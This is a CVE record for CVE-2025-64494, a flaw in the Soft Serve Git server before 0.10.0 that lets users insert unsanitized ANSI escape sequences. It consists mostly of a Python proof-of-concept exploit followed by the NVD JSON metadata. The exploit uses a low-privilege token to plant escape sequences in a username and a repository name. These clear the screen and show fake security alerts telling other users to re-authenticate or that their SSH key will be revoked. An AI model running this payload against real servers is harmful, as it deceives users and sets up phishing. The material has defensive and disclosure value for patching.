CVE-2025-64494

# ANSI Escape Sequence Injection PoC for CVE-2025-64494 # Target: Soft Serve Git Server < 0.10.0 # Attack: Inject ANSI escape sequences via username to display fake alerts import requests import json TARGET_URL = "http://target-server:23231" ATTACKER_TOKEN = "your-low-privilege-token" # Malicious username with ANSI escape sequences # \x1b[2J - Clear screen # \x1b[1;1H - Move cursor to top-left # \x1b[41;37;1m - Red background, white text, bold # \x1b[0m - Reset formatting fake_alert = "\x1b[2J\x1b[1;1H\x1b[41;37;1mCRITICAL SECURITY ALERT\x1b[0m\n\x1b[33mYour session has expired. Please re-authenticate.\x1b[0m" payload = { "username": fake_alert, "email": "[email protected]" } headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Update username with ANSI injection response = requests.patch( f"{TARGET_URL}/api/v1/account", headers=headers, json=payload ) if response.status_code == 200: print("[+] ANSI escape sequence injected successfully") print("[*] When other users view this username, they will see:") print(fake_alert) else: print(f"[-] Injection failed: {response.status_code}") print(response.text) # Alternative: Inject via repository name repo_payload = { "name": "\x1b[31m\x1b[5mFAKE WARNING\x1b[0m", "description": "\x1b[1mYour SSH key will be revoked in 24h\x1b[0m" } response = requests.post( f"{TARGET_URL}/api/v1/repos", headers=headers, json=repo_payload ) print(f"[*] Repository injection status: {response.status_code}")

{"cve": {"id": "CVE-2025-64494", "sourceIdentifier": "[email protected]", "published": "2025-11-08T02:15:35.060", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soft Serve is a self-hostable Git server for the command line. In versions prior to 0.10.0, there are several places where the user can insert data (e.g. names) and ANSI escape sequences are not being removed, which can then be used, for example, to show fake alerts. In the same token, git messages, when printed, are also not being sanitized. This issue is fixed in version 0.10.0."}, {"lang": "es", "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. En versiones anteriores a la 0.10.0, existen varios puntos donde el usuario puede insertar datos (por ejemplo, nombres) y las secuencias de escape ANSI no se están eliminando, lo que puede usarse, por ejemplo, para mostrar alertas falsas. Del mismo modo, los mensajes de Git, cuando se imprimen, tampoco se están saneando. Este problema se ha corregido en la versión 0.10.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-150"}]}], "references": [{"url": "https://github.com/charmbracelet/soft-serve/commit/d9639320b8d0ccd76fe6836a042c042b0ebde549", "source": "[email protected]"}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-fv2r-r8mp-pg48", "source": "[email protected]"}]}}